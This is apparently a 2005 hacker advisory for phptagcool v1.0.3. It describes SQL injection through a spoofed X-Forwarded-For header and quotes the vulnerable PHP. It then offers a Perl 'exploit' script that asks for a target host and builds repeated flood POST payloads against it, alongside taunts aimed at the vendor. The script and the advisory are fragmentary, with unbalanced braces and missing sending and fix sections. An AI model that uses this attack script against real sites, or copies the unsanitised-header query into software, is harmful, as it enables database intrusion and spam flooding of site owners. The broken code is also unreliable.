Professional Documents
Culture Documents
$ author: megabyte
$ contact: megabyte@diosdelared.com megabyte@gobiernofederal.com
mbytesecurity@gmail.com
$ date: aug 24 2005
$ website: http://mbytesecurity.org
$ risk: high
$ vendor url: http://crashcool.com
$ affected software: phptagcool v1.0.3
$greetz pandora te amo bb, rootbox for discovering the forwarded-for issue
#####################################################################
-= description =-
-= vulnerabilities =-
- | "sql inyection" |
the phptagcool software allows to inject sql code spoofing the x-forwarded-for
header
___________________________________________________________________________
#sacar ip
if (isset($_server['http_x_forwarded_for'])) {
$ip = $_server['http_x_forwarded_for'];
} elseif (isset($_server['http_via'])) {
$ip = $_server['http_via'];
}elseif (isset($_server['remote_addr'])) {
$ip = $_server['remote_addr'];
} else {
$ip = "x.x.x.x";
}
#comprobamos si el user esta baneado
#conectamos con la db
$conexion=mysql_connect($host,$usuario,$contrasenya);
#seleccionamos la db
mysql_select_db($base,$conexion);
$consulta2=mysql_query("select * from $t_ban where ip='$ip'"
,$conexion);
____________________________________________________________________________
- | exploit |
you can use any man in the middle software to intercept and edit the http headers
such as achilles.
but here its the exploit that allows 2 type of attacks,flood and sql injection
#!/usr/bin/perl
## phptagcool zatueritor 1.0
## copyright: megabyte www.mbytesecurity.org
## greetz: rootbox for discovering the forwarded-for issue
## te amo pandora
## crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que
inventaras?
use io::socket;
$x = 0;
print q(
phptagcool zatueritor 1.0
by megabyte
);
print q(host |sin http://www.| );
$host = <stdin>;
chop ($host);
while($x != 255)
{
$nick = "nick=megabyte";
$postit =
"$nick"."&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=en
viar";
$lrg = length $postit;
$x++;
}
}else{
------------------------------------------------------
-= how to fix =-
-= contact =-
megabyte
http://mbytesecurity.org
el dios de la red
saludos a pandora mi bb
zeus,cairo,redpoint,x0p0x and all lame band